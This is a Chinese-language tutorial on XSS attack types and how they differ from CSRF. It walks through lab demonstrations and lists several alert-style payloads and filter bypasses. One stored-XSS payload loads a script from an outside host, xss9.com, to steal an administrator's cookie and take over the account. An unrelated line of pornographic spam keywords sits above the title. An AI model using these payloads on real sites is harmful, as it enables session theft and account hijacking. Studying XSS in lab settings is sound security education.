欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

跨站腳本攻擊XSS與CSRF區(qū)別方法詳解

 更新時(shí)間:2022年10月10日 11:32:13   作者:XINO  
這篇文章主要為大家介紹了跨站腳本攻擊XSS與CSRF區(qū)別方法詳解,有需要的朋友可以借鑒參考下,希望能夠有所幫助,祝大家多多進(jìn)步,早日升職加薪

引文

上篇文章給大家?guī)?lái)了XML實(shí)體注入(XXE)不知道小伙伴們學(xué)了后有沒(méi)有自己去運(yùn)用,今天給大家?guī)?lái)了一個(gè)名為跨站腳本攻擊(XSS)的漏洞的介紹。

簡(jiǎn)介

XSS 攻擊全稱跨站腳本攻擊,XSS 是一種在 web 應(yīng)用中的安全漏洞,它允許攻擊者將代碼植入到 web 網(wǎng)站里面,供給其它用戶 訪問(wèn),當(dāng)用戶訪問(wèn)到有惡意代碼的網(wǎng)頁(yè)就會(huì)產(chǎn)生 xss 攻擊。

XSS與CSRF區(qū)別

之前講過(guò)CSRF漏洞,它同樣也是利用用戶訪問(wèn)網(wǎng)站鏈接來(lái)進(jìn)行攻擊,那么它與XSS漏洞之間的區(qū)別是什么,在我個(gè)人的理解中可以分為兩個(gè)大方向:

ONE

原理不同,CSRF利用的是網(wǎng)站本身的漏洞來(lái)去攻擊,而XSS則是將攻擊代碼插入網(wǎng)站中來(lái)進(jìn)行攻擊。

TWO

利用環(huán)境不同, CSRF攻擊中需要受害者登錄網(wǎng)站,網(wǎng)站有認(rèn)證信息才能攻擊,而XSS不用。

XSS攻擊方法

首先XSS有三種攻擊方式:

  • 反射型xss:不會(huì)永久存儲(chǔ)用戶的數(shù)據(jù),僅發(fā)生在用戶的一次訪問(wèn)之后。
  • 存儲(chǔ)型xss:攻擊代碼被持久化保存在服務(wù)器上,不會(huì)因?yàn)橐淮卧L問(wèn)就消失,持久攻擊。
  • DOM型不需要與服務(wù)器端交互的,它只發(fā)生在客戶端處理數(shù)據(jù)階段。

接下來(lái)我會(huì)分開(kāi)詳細(xì)的講解這幾種類(lèi)型是怎樣利用的:

反射型

客戶端通過(guò)某種方式向服務(wù)器端發(fā)送惡意JS代碼=>服務(wù)器將未過(guò)濾或過(guò)濾不徹底的惡意JS代碼輸出(返回給瀏覽器)=>瀏覽器中的JS解釋器解析惡意JS代碼,使用戶受到攻擊。

一個(gè)經(jīng)典的XSS攻擊請(qǐng)求,然網(wǎng)頁(yè)彈出xss:

<script>alert(/xss/)</script> 

當(dāng)然不止這一個(gè),很多情況下一些函數(shù)被過(guò)濾了,我們也有繞過(guò)過(guò)濾的方法,下面就簡(jiǎn)單列舉幾個(gè):

 <script>alert(vulnerable)</script>
 %3Cscript%3Ealert('XSS')%3C/script%3E
 <script>alert('XSS')</script>
 <img src="javascript:alert('XSS')">
 <DIV STYLE="background-image: url(javascript:alert('XSS'))">
 <DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html');">
 <DIV STYLE="width: expression(alert('XSS'));">
 1"><ScscriptRipt>alert(1)</ScscriptRipt>

接下來(lái)給大家?guī)?lái)一個(gè)滲透的例子:

我們打開(kāi)靶機(jī)查看源碼,發(fā)現(xiàn)它是向服務(wù)器提交了一個(gè)name參數(shù),而這一個(gè)參數(shù)值插入到了<h3></h3>標(biāo)簽之間 ,因此可能存在XSS漏洞。

于是我們構(gòu)造請(qǐng)求,將name賦值為:

<script>alert('xss')</script>

一個(gè)經(jīng)典的彈窗payload,我們提交請(qǐng)求查看效果:

成功彈窗,一次簡(jiǎn)單的反射XSS攻擊成功達(dá)成。

存儲(chǔ)型

儲(chǔ)型XSS的特別之處在于提交的代碼會(huì)存儲(chǔ)在服務(wù)器端(數(shù)據(jù)庫(kù)、內(nèi)存、文件系統(tǒng)等),下次請(qǐng)求時(shí)目標(biāo)頁(yè)面時(shí)不用再提交XSS代碼。所以存儲(chǔ)型XSS的攻擊效果更強(qiáng),而且攻擊的范圍更廣。一般存在于留言板評(píng)論等地區(qū)。 用一個(gè)靶機(jī)來(lái)給大家演示一下:

一個(gè)可以發(fā)表信息樹(shù)洞網(wǎng)站,有登錄和評(píng)論系統(tǒng),我們先隨便評(píng)論幾句測(cè)試一下:

構(gòu)造PAYLOAD

<IMG SRC="javascript.:alert('XINO');">

我們簡(jiǎn)單訪問(wèn)一下存儲(chǔ)路徑,發(fā)現(xiàn)是一個(gè)錯(cuò)報(bào)的圖片,存在XSS漏洞,接著我們利用XSS平臺(tái)(一個(gè)DIY構(gòu)造不同XSS攻擊功能代碼的網(wǎng)站,當(dāng)XSS生效時(shí)可以回到網(wǎng)站查看攻擊是否生效和攻擊得出的信息)構(gòu)造XSSpayload

得到構(gòu)造好的惡意攻擊鏈接:

<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='https://xss9.com/PAns';>

提交在評(píng)論區(qū)然后訪問(wèn)保存路徑,回到XSS平臺(tái)查看:

得到admin管理員的cookie,我們就可以通過(guò)修改cookie來(lái)獲取管理員權(quán)限,從而進(jìn)行進(jìn)一步的滲透攻擊。上面就是一個(gè)簡(jiǎn)單的存儲(chǔ)型XSS的利用。

DOM型

攻擊代碼并不需要服務(wù)器解析響應(yīng),利用的是瀏覽器端的DOM解析,在客戶端直接輸出DOM內(nèi)容的時(shí)候極易觸發(fā)DOM型XSS漏洞。因?yàn)槔帽容^少,就放個(gè)簡(jiǎn)單payload:

<img src=1 onerror=alert(1)>

XSS攻擊危害

根據(jù)上文的演示大家也能看出來(lái)XSS的危害了吧,這里就綜合簡(jiǎn)述一下它的危害。

  • 盜取各類(lèi)用戶帳號(hào),如管理員帳號(hào)
  • 控制企業(yè)數(shù)據(jù),包括讀取、篡改、添加、刪除企業(yè)敏感數(shù)據(jù)的能力
  • 網(wǎng)站掛馬
  • 強(qiáng)制發(fā)送電子郵件(釣魚(yú))
  • 控制受害者機(jī)器(肉雞)向其它網(wǎng)站發(fā)起攻擊

結(jié)語(yǔ)

今天比較詳細(xì)的講了XSS漏洞的原理以及應(yīng)用方法,其中比較重要的是反射型XSS與存儲(chǔ)型XSS,這兩個(gè)的利用條件并不是很苛刻而且效果很突出,有興趣的小伙伴可以自己去搭建靶機(jī)來(lái)進(jìn)行合法測(cè)試,切勿隨意對(duì)別人網(wǎng)站進(jìn)行測(cè)試攻擊,互聯(lián)網(wǎng)并非法外之地,以上就是跨站腳本攻擊XSS與CSRF區(qū)別方法詳解的詳細(xì)內(nèi)容,更多關(guān)于跨站腳本攻擊XSS CSRF的資料請(qǐng)關(guān)注腳本之家其它相關(guān)文章!

相關(guān)文章

最新評(píng)論